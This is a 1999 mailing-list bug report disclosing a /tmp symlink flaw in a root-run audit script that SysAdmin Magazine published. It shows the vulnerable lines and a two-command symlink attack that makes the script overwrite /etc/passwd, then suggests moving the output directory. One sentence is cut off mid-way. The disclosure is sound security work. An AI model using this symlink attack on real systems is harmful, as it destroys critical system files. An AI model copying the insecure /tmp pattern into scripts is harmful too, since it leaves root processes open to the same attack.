Security bug in a shell script in January issue of SysAdmin Magazine

Date: Mon, 4 Jan 1999 02:33:46 -0800
From: "Jan B. Koum" <[email protected]>
To: [email protected]
Subject: January SysAdmin EY script DoS bug.

/* Warning! Lame bug report ahead. */

/* This is nothing against EY. They are a good company. This
is against people who claim to be security experts and can't
write a secure script. */

        Lets make it short. SysAdmin (www.samag.com - btw, their
        DNS is brocken. Isn't it ironic that they can't get their
        own systems running, yet they teach others how) magazine
        published a script in Jan 1999 issue which, after you
        run it as root, tells you stuff about your system. Here
        are some parts of this script:

set HOSTNAME=`hostname`
set basedir=/tmp/eyscan
set OUTPUT=?{basedir}/ey-?{HOSTNAME}.out

        After that, output like 'ls -l /etc/passwd' is sent to

        So you know that your admin runs lame scripts as root
        and what do you do? Hmm.. gee..

% mkdir /tmp/eyscan
% ln -s /etc/passwd /tmp/eyscan/ey-`hostname`.out

        After an admin runs the script - he is toasted. A points
        to this story kids:
        o  set basedir=/root or /var/run ..

-- Yan